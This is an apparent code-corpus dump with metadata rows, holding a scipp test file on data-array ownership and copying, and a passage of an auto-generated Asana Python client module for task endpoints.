] | 30.7 | 53 | 0.553746 | 34 | 307 | 4.235294 | 0.5 | 0.097222 | 0.111111 | 0.166667 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0 | 0.020942 | 0.37785 | 307 | 10 | 54 | 30.7 | 0.732984 | 0 | 0 | 0 | 0 | 0 | 0.24026 | 0.097403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
588b0da0b429fc543dcbbd93d922d430f1cbdbf7 | 10,858 | py | Python | tests/ownership_dataset_test.py | mlund/scipp | 26648fdcda49b21a7aacdafd58625fab7ee3403b | [
"BSD-3-Clause"
] | null | null | null | tests/ownership_dataset_test.py | mlund/scipp | 26648fdcda49b21a7aacdafd58625fab7ee3403b | [
"BSD-3-Clause"
] | null | null | null | tests/ownership_dataset_test.py | mlund/scipp | 26648fdcda49b21a7aacdafd58625fab7ee3403b | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author Jan-Lukas Wynen
from copy import copy, deepcopy
import pytest
import scipp as sc
def make_data_array():
v = sc.array(dims=['x'], values=[10, 20], unit='m')
c = sc.array(dims=['x'], values=[1, 2], unit='s')
a = sc.array(dims=['x'], values=[100, 200])
m = sc.array(dims=['x'], values=[True, False])
da = sc.DataArray(v, coords={'x': c}, attrs={'a': a}, masks={'m': m})
return da, v, c, a, m
def test_own_darr_set():
# Data and metadata are shared
da, v, c, a, m = make_data_array()
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
# Assignments overwrite data but not metadata.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
da.masks['m'] = sc.array(dims=['x'], values=[True, True])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])},
masks={'m': sc.array(dims=['x'], values=[True, True])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
def test_own_darr_get():
# Data and metadata are shared.
da = make_data_array()[0]
v = da.data
c = da.coords['x']
a = da.attrs['a']
m = da.masks['m']
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
# Assignments overwrite data but not coords.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
da.masks['m'] = sc.array(dims=['x'], values=[True, True])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])},
masks={'m': sc.array(dims=['x'], values=[True, True])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
def test_own_darr_get_meta():
# Data and metadata are shared.
da = make_data_array()[0]
del da.masks['m'] # not accessible through .meta and tested elsewhere
v = da.data
c = da.meta['x']
a = da.meta['a']
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
c['x', 1] = -2
a['x', 1] = -200
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
# Assignments overwrite data but not coords.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
def test_own_darr_copy():
# Depth of copy can be controlled.
da, _, c, a, m = make_data_array()
da_copy = copy(da)
da_deepcopy = deepcopy(da)
da_methcopy = da.copy(deep=False)
da_methdeepcopy = da.copy(deep=True)
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
modified = sc.DataArray(
sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])})
assert sc.identical(da, modified)
assert sc.identical(da_copy, modified)
assert sc.identical(da_deepcopy, make_data_array()[0])
assert sc.identical(da_methcopy, modified)
assert sc.identical(da_methdeepcopy, make_data_array()[0])
def test_own_dset_set_access_through_dataarray():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['da1']['x', 0] = -10
dset['da1'].attrs['a']['x', 0] = -100
dset['da1'].masks['m']['x', 0] = False
da['x', 1] = -20
da.coords['x']['x', 1] = -2
da.attrs['a']['x', 1] = -200
da.masks['m']['x', 1] = True
dset['da1'].unit = 'kg'
expected = sc.DataArray(
sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[1, -2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_scalar_slice():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', 0]['da1'].value = -10
dset['x', 0]['da1'].attrs['a'].value = -100
dset['x', 0]['da1'].masks['m'].value = False
with pytest.raises(sc.VariableError):
dset['x', 0]['da1'].attrs['x'].value = -1
with pytest.raises(sc.UnitError):
dset['x', 0]['da1'].unit = 's'
expected = sc.DataArray(sc.array(dims=['x'], values=[-10, 20], unit='m'),
coords={'x': sc.array(dims=['x'], values=[1, 2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, 200])},
masks={'m': sc.array(dims=['x'], values=[False, False])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_range_slice():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', :]['da1']['x', 0] = -10
dset['x', :]['da1'].attrs['a']['x', 0] = -100
dset['x', :]['da1'].masks['m']['x', False] = False
dset['x', :]['da1'].unit = 'kg'
expected = sc.DataArray(sc.array(dims=['x'], values=[-10, 20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[1, 2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, 200])},
masks={'m': sc.array(dims=['x'], values=[False, False])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_coords():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset.coords['x']['x', 0] = -1
expected, *_ = make_data_array()
expected.coords['x']['x', 0] = -1
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_range_slice_coords():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', :]['da1']['x', 0] = -10
dset['x', :].coords['x']['x', 0] = -1
expected, *_ = make_data_array()
expected['x', 0] = -10
expected.coords['x']['x', 0] = -1
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
| 40.214815 | 88 | 0.532234 | 1,638 | 10,858 | 3.472527 | 0.064713 | 0.095992 | 0.150844 | 0.164557 | 0.867968 | 0.83808 | 0.833509 | 0.809423 | 0.80327 | 0.793601 | 0 | 0.048783 | 0.220298 | 10,858 | 269 | 89 | 40.364312 | 0.623081 | 0.05793 | 0 | 0.706422 | 0 | 0 | 0.034283 | 0 | 0 | 0 | 0 | 0 | 0.211009 | 1 | 0.045872 | false | 0 | 0.013761 | 0 | 0.06422 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
544b1455139ea3ae88bce0519587cfef2e84f47d | 43,304 | py | Python | asana/resources/gen/tasks.py | FiyaFly/python-asana | ef9e6ff3e82e9f1ca18d526401f524698c7215c7 | [
"MIT"
] | null | null | null | asana/resources/gen/tasks.py | FiyaFly/python-asana | ef9e6ff3e82e9f1ca18d526401f524698c7215c7 | [
"MIT"
] | null | null | null | asana/resources/gen/tasks.py | FiyaFly/python-asana | ef9e6ff3e82e9f1ca18d526401f524698c7215c7 | [
"MIT"
] | null | null | null | # coding=utf-8
class _Tasks:
def __init__(self, client=None):
self.client = client
def add_dependencies_for_task(self, task_gid, params=None, **options):
"""Set dependencies for a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addDependencies".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_dependents_for_task(self, task_gid, params=None, **options):
"""Set dependents for a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addDependents".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_followers_for_task(self, task_gid, params=None, **options):
"""Add followers to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addFollowers".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_project_for_task(self, task_gid, params=None, **options):
"""Add a project to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addProject".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_tag_for_task(self, task_gid, params=None, **options):
"""Add a tag to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addTag".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def create_subtask_for_task(self, task_gid, params=None, **options):
"""Create a subtask
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/subtasks".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def create_task(self, params=None, **options):
"""Create a task
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks"
return self.client.post(path, params, **options)
def delete_task(self, task_gid, params=None, **options):
"""Delete a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.delete(path, params, **options)
def duplicate_task(self, task_gid, params=None, **options):
"""Duplicate a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/duplicate".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def get_dependencies_for_task(self, task_gid, params=None, **options):
"""Get dependencies from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/dependencies".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
def get_dependents_for_task(self, task_gid, params=None, **options):
"""Get dependents from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/dependents".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
def get_subtasks_for_task(self, task_gid, params=None, **options):
"""Get subtasks from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/subtasks".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
def get_task(self, task_gid, params=None, **options):
"""Get a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.get(path, params, **options)
def get_tasks(self, params=None, **options):
"""Get multiple tasks
:param Object params: Parameters for the request
- assignee {str}: The assignee to filter tasks on. *Note: If you specify `assignee`, you must also specify the `workspace` to filter on.*
- project {str}: The project to filter tasks on.
- section {str}: The section to filter tasks on. *Note: Currently, this is only supported in board views.*
- workspace {str}: The workspace to filter tasks on. *Note: If you specify `workspace`, you must also specify the `assignee` to filter on.*
- completed_since {datetime}: Only return tasks that are either incomplete or that have been completed since this time.
- modified_since {datetime}: Only return tasks that have been modified since the given time. *Note: A task is considered “modified” if any of its properties change, or associations between it and other objects are modified (e.g. a task being added to a project). A task is not considered modified just because another object it is associated with (e.g. a subtask) is modified. Actions that count as modifying the task include assigning, renaming, completing, and adding stories.*
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks"
return self.client.get_collection(path, params, **options)
def get_tasks_for_project(self, project_gid, params=None, **options):
"""Get tasks from a project
:param str project_gid: (required) Globally unique identifier for the project.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/projects/{project_gid}/tasks".replace("{project_gid}", project_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_section(self, section_gid, params=None, **options):
"""Get tasks from a section
:param str section_gid: (required) The globally unique identifier for the section.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/sections/{section_gid}/tasks".replace("{section_gid}", section_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_tag(self, tag_gid, params=None, **options):
"""Get tasks from a tag
:param str tag_gid: (required) Globally unique identifier for the tag.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tags/{tag_gid}/tasks".replace("{tag_gid}", tag_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_user_task_list(self, user_task_list_gid, params=None, **options):
"""Get tasks from a user task list
:param str user_task_list_gid: (required) Globally unique identifier for the user task list.
:param Object params: Parameters for the request
- completed_since {str}: Only return tasks that are either incomplete or that have been completed since this time. Accepts a date-time string or the keyword *now*.
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/user_task_lists/{user_task_list_gid}/tasks".replace("{user_task_list_gid}", user_task_list_gid)
return self.client.get_collection(path, params, **options)
def remove_dependencies_for_task(self, task_gid, params=None, **options):
"""Unlink dependencies from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeDependencies".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_dependents_for_task(self, task_gid, params=None, **options):
"""Unlink dependents from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeDependents".replace("{task_gid}", task_gid)
